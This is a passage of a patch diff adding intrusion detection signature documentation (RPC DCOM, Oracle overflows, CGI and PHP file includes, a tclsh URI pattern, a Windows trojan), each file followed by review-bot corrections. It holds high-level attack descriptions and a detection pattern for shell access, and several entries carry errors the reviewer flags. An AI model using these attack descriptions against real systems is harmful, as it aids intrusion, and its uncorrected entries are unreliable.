+	Red Hat Linux 4.2, 5.0, 5.1, 5.2, 6.0
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where amd runs
+and then attack the amd port. Alternatively, an attacker may attempt to
+execute the exploit code on any listening port in the RPC range if the
+portmapper is blocked. 
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
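Review bot: Additional References is empty even though Affected Systems lists exact releases (BSDI BSD/OS 3.1, 4.0.1; FreeBSD 3.0, 3.1, 3.2; Red Hat Linux 4.2 to 6.0) and Ease of Attack says "Exploit code is freely available"; add the advisory or CVE those versions were taken from. Style: the blank line between "Rule:" and the first "--" that every other file in this patch has is missing here.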
--- /dev/null
+++ b/doc/signatures/2828.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2828
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_repgroup
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
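Review bot: formatting error in Detailed Information, the sentence is split as "vulnerability in the procedure comment_on_repgroup" / ". This procedure is included in" / "sys.dbms_repcat_mas.", leaving the full stop orphaned at the start of a line; join it into one sentence. Affected Systems reads "Oracle Oracle9i" (duplicated word), and Additional References is empty although a specific package and procedure are named; add the vendor alert for it.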
--- /dev/null
+++ b/doc/signatures/2190.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2190
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+--
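Review bot: Impact is understated: it says only "Denial of Service (DoS)." while Detailed Information says the overflow lets the attacker "execute arbitrary code with the privileges of the local system account"; align Impact with the body (sid 3223 in this same patch has identical body text and lists code execution). Also "Expoit code exists" should be "Exploit code exists", and the Attack Scenarios sentence about "a request for a file with an overly long filename via a network share" should explain how that relates to the malformed RPC request described two sections earlier.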
--- /dev/null
+++ b/doc/signatures/2333.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 
+2333
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an FTP server.
+
+--
+Impact:
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious
+activity in FTP traffic between hosts.
+
+It is possible for a user to supply data to an FTP ommand and have it
+interpreted as code. The attacker might then be able to run code of
+their choosing with the privileges of the user running the FTP service.
+
+--
+Affected Systems:
+	PlatinumFTP PlatinumFTPserver 1.0.18
+
+--
+Attack Scenarios:
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a 
+host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
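Review bot: typo "supply data to an FTP ommand" ("command"), and the text never says which FTP command or argument triggers the condition even though Affected Systems names a single product and version (PlatinumFTPserver 1.0.18); state the affected command and add a reference for that version, since Additional References is empty. "This event is indicative of spurious activity in FTP traffic between hosts" is too vague to help an analyst triage the alert.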
--- /dev/null
+++ b/doc/signatures/1592.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1592
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
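Review bot: missing documentation: nothing in the file says which CGI script or application sid 1592 matches on; Summary, Detailed Information and Affected Systems ("All systems running CGI applications") are generic boilerplate, so an analyst cannot tell what the alert means or whether the target even runs the affected software. Add the script name, the vulnerable parameter and a reference. Typo "running ona web server" ("on a").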
--- /dev/null
+++ b/doc/signatures/1352.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+1352
+
+--
+Summary:
+Attempted tclsh command access via web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to execute a tclsh command or script on a webserver. tclsh is a shell application that reads tcl commands and evaluates them. The attacker could possibly execute a command or script on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'tclsh'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine.
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1351
+
+--
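Review bot: the Affected Systems section present in every other file is missing here, and Impact ("Attempt to gain information on system processes on webserver") does not match Detailed Information, which says "The attacker could possibly execute a command or script on the host"; make Impact state command execution as the web server user. Minor: missing space in "contains 'tclsh'in the URI", "it's designated web root" should be "its", and the bare "sid: 1351" under Additional References should say what that related rule covers.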
--- /dev/null
+++ b/doc/signatures/3060.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3060
+
+--
+Summary:
+This event is generated when an attempt is made to initiate a TLS
+connection via SSL version 2.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule indicates that an attempt has been made to initiate a TLS
+connection via SSL v2. This rule should not generate an event.
+
+--
+Affected Systems:
+	All implementations using SSL.
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
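Review bot: Detailed Information contradicts itself: "This rule indicates that an attempt has been made to initiate a TLS connection via SSL v2. This rule should not generate an event." If the rule is informational or is meant to be disabled by default, say so and state what a firing means for the analyst; at present Impact is "Unknown" and Attack Scenarios, Ease of Attack and Corrective Action are all "NA", so the file documents nothing actionable.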
--- /dev/null
+++ b/doc/signatures/100000839.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000839
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHP Event Calendar" application running on a webserver. Access to the file "calendar.php" using a remote file being passed as the "path_to_calendar" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "path_to_calendar" parameter in the "calendar.php" script used by the "PHP Event Calendar" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Event Calendar
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
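Review bot: the third paragraph of Detailed Information ("... validating the credentials of a client host connecting to the services offered on a host server") and the Attack Scenarios text about supplying credentials to "an authentication mechanism" are boilerplate that do not describe the remote file include in "path_to_calendar" stated in the Summary; replace them with the actual scenario (a URL to an attacker-hosted file passed as the parameter value to "calendar.php") and drop the credential wording. Also "running ona web server", and Additional References is empty.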
--- /dev/null
+++ b/doc/signatures/3127.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3127
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
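Review bot: Additional References is empty although the flaw is described specifically ("The unchecked buffer exists when processing the length of messages sent to the logging service"); add the Microsoft bulletin and CVE. Affected Systems: "Microsoft Windows Server 2000" is not a product name (Windows 2000 Server), and "Microsoft Windows NT Server" needs a version. Style: stray blank line between "--" and "Corrective Action:".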
--- /dev/null
+++ b/doc/signatures/2143.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 2143
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the cafelog php application. 
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability in the cafelog PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL, the script is processed and executed with the privileges of the user running the webserver. This is due to poor checking of user supplied variables in the gm-2-b2.php script.
+
+--
+Affected Systems:
+Any host using cafelog.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script via gm-2-b2.php.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
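Review bot: Corrective Action does not contain the fix: "Check the php implementation on the host" is vague, and nothing tells the reader to upgrade or patch cafelog or to stop PHP including files from URLs, although Detailed Information says the attacker can "include a PHP file of his choosing via a URL" through gm-2-b2.php. Add the vendor patch/upgrade step and a reference (Additional References is empty). Style: "Sid: 2143" on one line differs from the "Sid:" / "2143" layout used elsewhere in the patch.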
--- /dev/null
+++ b/doc/signatures/2701.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+2701
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+--
+Affected Systems:
+	Oracle iSQLPlus
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
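Review bot: the vulnerable procedure is never identified: Attack Scenarios refers to "the procedure in question", but unlike sid 2828 in this patch (comment_on_repgroup in sys.dbms_repcat_mas) no package or procedure is named anywhere. Affected Systems lists "Oracle iSQLPlus", which does not obviously fit a description of overflows in database "packages and procedures"; name the actual component the rule matches and add a reference (Additional References is empty).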
--- /dev/null
+++ b/doc/signatures/3223.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3223
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
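Review bot: Additional References is empty, yet the body is word-for-word the same as sid 2190's, which cites MS03-026 and CAN-2003-0352; if 3223 covers the same vulnerability, add the same references and say how the two rules differ (e.g. what traffic each one matches), otherwise explain what distinguishes this one. Typo "Expoit code exists".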
--- /dev/null
+++ b/doc/signatures/153.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+153
+
+--
+Summary:
+Donald Dick is a Trojan Horse allowing the attacker to access various 
+resources on the victim host. This event is generated when the attackers
+client connects to the Trojan server.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows NT
+
+The Trojan changes system registry settings to add the Donald Dick 
+server to programs normally started on boot. Due to the nature of this 
+Trojan it is unlikely that the attacker's client IP address has been 
+spoofed.
+
+The default name of the server application is vmldir.vxd.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\VxD\
+
+Registry keys added:
+
+	VMLDR
+
+This contains the key StaticVxD = "vmldir.vxd"
+
+Delete the registry key VMLDR.
+
+Delete the Troajn application vmldir.vxd.
+
+A reboot of the infected machine is needed.
+
+--
+Contributors:
+Original rule written by unknown persons.
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Hackfix
+http://www.hackfix.org/miscfix/dd.shtml
+
+--
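Review bot: the Affected Systems section is missing; the OS list (Windows 95, 98, NT) sits under Detailed Information instead. Ease of Attack gives advice about virus definition files rather than a statement of difficulty. Typo "Delete the Troajn application vmldir.vxd." ("Trojan"). The Corrective Action registry instructions would read more clearly as one full key, HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\VxD\VMLDR with the value StaticVxD = "vmldir.vxd", rather than the path, the key name and the value spread over three fragments.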
--- /dev/null
+++ b/doc/signatures/847.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+847
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
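Review bot: this file is the same generic CGI text as sid 1592 with only the Sid changed; it never says which script, parameter or product sid 847 detects, and Affected Systems is "All systems running CGI applications". Add the specific target and a reference so the two rules can be told apart. Typo "running ona web server".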
--- /dev/null
+++ b/doc/signatures/317.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 317
+
+--
+Summary:
+This event is generated when an attempt is made to escalate privileges remotely using a vulnerability in mountd.
+
+--
+Impact:
+System compromize presenting the attacker with escalated system privileges .
+
+--
+Detailed Information:
+Some implementations of the Network File System (NFS) on Linux systems use a vulnerable version of mountd that is subject to a buffer overflow condition in the logging subsystem.
+
+The mountd logging facility also logs failed attempts to mount shared resources, even if NFS is not enabled on the system. This means that exploitation of this issue is possible wether or not NFS is being used.
+
+Affected Systems:
+	Caldera OpenLinux Standard 1.2
+	RedHat Linux 2.0, 2.1, 3.0.3, 4.0, 4.1, 4.2, 5.0, 5.1
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/121
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
+
+CERT:
+http://www.cert.org/advisories/CA-1998-12.html
+http://www.cert.org/summaries/CS-98-08.html
+
+--
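Review bot: the "--" separator before "Affected Systems:" is missing, so that section runs straight on from Detailed Information. The CVE link (CVE-2000-0917) does not line up with the other references, CERT CA-1998-12 and Bugtraq 121, which date this mountd issue to 1998; verify the identifier before shipping. Attack Scenarios ("Exploit scripts are available") repeats Ease of Attack instead of describing the attack (a long string sent to mountd that overflows the logging buffer, per Detailed Information). Typos: "compromize", "wether".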
--- /dev/null
+++ b/doc/signatures/1515.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1515
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
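Review bot: third copy of the generic CGI boilerplate (see 1592 and 847 in this patch); nothing identifies what sid 1515 actually matches. Add the script name, the parameter and a reference, and fix "running ona web server".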
--- /dev/null
+++ b/doc/signatures/2043.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2043
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Internet Security Association and Key Management 
+Protocol (ISAKMP).
+
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+ISAKMP is a framework for authentication using cryptographic keys. It 
+specifically defines the process of key exchange as opposed to the 
+generation of a cryptographic key.
+
+ISAKMP also details the procedures for the required security 
+associations in network security services.
+
+This event indicates that a key exchange using ISAKMP failed.
+
+--
+Affected Systems:
+All systems using cryptographic key exchange as an authentication 
+method.
+
+--
+Attack Scenarios:
+The attacker may have a store of keys associated with valid users and 
+may attempt to authenticate using a combination of username and key.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+A user may mistype a username or may be trying to authenticate using an 
+expired key.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Ensure that key exchanges are only allowed between trusted hosts.
+
+Check log files for disallowed login attempts.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ISAKMP:
+http://www.networksorcery.com/enp/protocol/isakmp.htm
+
+RFC:
+http://www.ietf.org/rfc/rfc2407.txt
+http://www.ietf.org/rfc/rfc2408.txt
+
+IANA:
+http://www.iana.org/assignments/isakmp-registry
+
+--
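Review bot: Summary and Detailed Information disagree: Summary says "an attempt is made to exploit a known vulnerability" in ISAKMP, but Detailed Information says "This event indicates that a key exchange using ISAKMP failed" and Impact is "Unknown". Pick one and state what the rule actually matches. The Attack Scenarios text about "a combination of username and key" does not fit an ISAKMP exchange, which RFC 2408 (cited below) defines in terms of security associations and key exchange, not usernames; the opening line "ISAKMP is a framework for authentication using cryptographic keys" should be reworded the same way.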
--- /dev/null
+++ b/doc/signatures/698.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+698
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
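Review bot: Affected Systems is empty and the vulnerability is never identified; Summary promises "a known vulnerability in Microsoft SQL" but Detailed Information only gives generic unauthorized-access text and the server/client wording ("Microsoft SQL server or client") does not say which side the rule watches. Name the product and version, the weakness, and add a reference (Additional References is also empty).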
--- /dev/null
+++ b/doc/signatures/100000454.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000454
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "KAPhotoservice" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
